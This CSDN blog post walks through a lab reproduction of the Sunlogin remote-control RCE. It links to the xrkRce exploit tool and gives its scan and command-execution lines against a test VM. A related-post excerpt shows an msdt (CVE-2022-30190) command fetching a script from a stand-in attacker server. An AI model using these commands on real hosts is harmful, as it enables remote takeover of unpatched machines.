向*葵远程代码执行(自己复现过程)

已于 2022-11-11 17:18:28 修改
阅读量5.3k 收藏 22
点赞数 5
分类专栏: Kali渗透 渗透测试 文章标签: web安全 安全
于 2022-02-25 18:21:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WEARE001/article/details/123138768
版权

前言

本文内容仅为技术科普,请勿用于非法用途!

一、准备测试环境

1.windows虚拟机(内网IP地址172.16.20.68)
2.kali linux (内网IP地址172.16.20.76)

二、向日葵软件

存在漏洞向日葵版本:11.1.1、10.3.0.27372、11.0.0.33162
在这里插入图片描述

三、工具及源码下载地址

链接:https://pan.baidu.com/s/19qBlCxvWxhOj3qJd_MVfyw
提取码:xhil

四、扫描漏洞

1.这里用的kali,所以下载linux版本,并进行解压;
注意:这里需要给解压后的文件xrkRce所有权限(777),不然会提示权限不够;
在这里插入图片描述在这里插入图片描述
2.进行漏洞扫描,确认存在漏洞的端口;

./xrkRce -h 172.16.20.68

在这里插入图片描述

这里发下端口为65326;
3.现在对漏洞进行利用,进行远程命令,查看对方IP;

./xrkRce -h 172.16.20.68 -c "ipconfig" -p 65326 -t rce

在这里插入图片描述
注意:这里可能会提示命令【命令执行完毕,但是没有回显】,需要去开启回显【防火墙-高级设置-出站规则-回显】
在这里插入图片描述
在这里插入图片描述

更多安全分享,请关注【安全info】微信公众号!

流浪法师12
关注
  • 5
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Sunflower(向日)源码分析
weixin_30783629的博客
09-24 4429
简介: Sunflower项目是google发布的kotlin项目,里面主要介绍google 最新的一些工具,使开发者可以快速构建自己的APP项目,具体源码:https://github.com/googlesamples/android-sunflower 在自己安装编译的时候,建议把包名(com.google.samples.apps.sunflower)改动下,因为com.go...
向日远程控制软件 v5.2.27.2356
11-02
本站下载文件包含主控端和被控端两个文件。向日是一款完全免费的远程控制软件。您在任何可连入互联网的地点,都可以轻松访问和控制安装了向日被控端的远程主机,整个过程可以通过浏览器操作,也可以通过主控端软件操作。向日远程控制具有面对各种杂网络环境下实内网穿透,您可以轻松通过浏览器对远程PC的服务、进程、用户和文件等进行管理。 【向日远程控制特性介绍】1.全新多标签界面样式通过多标签方式可以在远程控制台轻松切换各类管理项目,支持皮肤更换。专业高品质的界面构成,为你带来全新的视觉享受。2.全面安全呵护 采用SSL/AES 256位数据加密传输,全面使用HTTPS加密方式访问,采用Windows系统账号认证,必须拥有远程主机的账号才能登陆远程主机,远程主机控制权授权模式等。3.WEB方式的主控端模式无处不在的远程管理模式,只要能连入互联网的地方,就可以轻松管理自己的远程主机,采用浏览器插件的主控端模式,通过浏览器直接控制远程主机。4.远程主机管理 通过向日远程控制台可以对远程主机进行性能检测、时间查看、进程和服务管理、用户和组管理、CMD命令行等操作。5.独有远程桌面HSKRC传输协议
向日远程代码执行
qq_36148463的博客
08-21 315
链接:https://pan.baidu.com/s/1MVCW_Ggk-hAd05_y7ODwEw提取码:wxu9。
CVE-2022-10270(向日远程代码执行漏洞)
最新发布
cc123489ll的博客
05-21 288
引言漏洞描述影响版本:原理:环境搭建手动脚本建议。
向日远程代码执行漏洞
weixin_53440207的博客
02-27 1520
向日远程代码执行漏洞
spring boot远程代码执行漏洞
qq_63980959的博客
09-20 2283
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码
Struts2-052(CVE-2017-9805)远程代码执行漏洞
weixin_44253823的博客
11-06 1608
漏洞简介:2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞,漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列...
HTTP.sys远程代码执行(CVE2015-1635)分析
加油~
08-16 2409
在这个过程中,如果range指定的数据开始offset小于紧凑的数据包头部的总长度,那么这里在计算最后的发包读取数据时,还会触发一个整数溢出,即0xffffffff(-1,已经被变为32位数)- lower + 1 + header size,如果lower < header size,那么将会导致最后32位整数溢出计算出一个较小的数值,这样导致不会BSOD(如果精确控制响应包大小和文件大小,即使这样还是有可能触发BSOD),告诉服务器,请求资源是哪个范围的内容,让断点续传和并行下载得以实。...
向日远程控制软件被控端 v8.1.0.38378.zip
07-11
向日远程控制软件被控端是一款阳光的远程控制及远程桌面产品,获得微软认证,界面友好,简单易用,安全放心,且身材迷你小巧,仅2.7M。配合向日开机棒,还可支持数百台主机的远程开机,实远程开机与控制一体化。(开机棒详情请见官网sunlogin.oray.com) 通过向日你可以在世界上任何地点、任何网络中,轻松实手机控制手机,手机控制电脑,电脑控制电脑。向日的主要功能有远程桌面控制、桌面监控、远程文件传输、远程摄像头监控、远程管理、CMD命令行等。只需要在2台设备同时下载并安装向日即可实远程操控。 向日远程控制软件被控端特点 1、免安装 使用绿色版不需要安装,可以直接运行,快速被远控,省时高效。   2、 远程桌面 从世界任何地方使用移动设备或电脑远程访问您的远端电脑桌面,向日采用独有的远程桌面协议,让你轻松浏览文件、观看图片、视频、电影等。同时面对2G/3G异动终端,享受跨平台的极速远程桌面访问,支持畅顺的音频/视频。 3、桌面观看 用于远程桌面监控,不改变被控端任何设置。 4、远程摄像头 实时查看远程主机摄像头周围的情况,支持多摄像头切换,实全方位的远程监控。 5、远程文件 方便快捷的让远程文件或本地文件互相传输和同步,安全稳定。 6、远程开机 无论远程主机电脑是休眠或者关机状态,一键即可轻松开启远程主机电脑。 向日远程控制软件 v8.1.0.38378更新日志 1.添加主机列表 2.修正黑屏失效的问题 3.支持Tab键 4.修远程文件相关问题 5.优化!优化!优化! 向日远程控制软件被控端截图
向日(服务器和客服端)
08-27
方便你在任何时候任何地点远程链接其它电脑
手机远程桌面源码.zip
07-10
VNC Server是Linux下的图形化远程登录控制软件类似于windows的远程桌面,本项目是一个基于android平台的VNC Server项目,开启以后可以在其他设备上通过vncviewer客户端访问开启VNC服务的服务器,项目需要root权限,我手机没有root就不能用了,大体上给大家截一张图吧。  
向日远程控制端 for Linux v1.1.0.35170 beta.zip
07-17
向日远程控制软件是一款免费的远程PC管理和服务软件,可通过web、PC,Linux主控端或移动端远程控制windows和Linux系统主机,支持远程观看、远程控制、远程摄像头等功能,配合向日远程开机棒还可实一键远程开机。增加支持Linux主控端。 向日远程控制端 for Linux更新内容 修开机授权与web不同步的bug
向日(SunLoginClient_10.5.0.29)RCE验证
柳似烟的专栏
02-18 7240
向日RCE远程命令执行
【漏洞】内网实战-Sunlogin RCE 向日远程代码执行
dengpan119的博客
03-29 2048
文章目录漏洞介绍一、影响版本二、实战1.漏洞检测工具与思路2.实战检测总结 漏洞介绍 向日远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日客户端的远程主机。同时还能实远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。 Sunlogin RCE 是漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实远程命令执行利用,客户端开启客户端会自动随机开启一个大于
cve-2022-30190 msdt远程代码执行漏洞
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流浪法师12

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值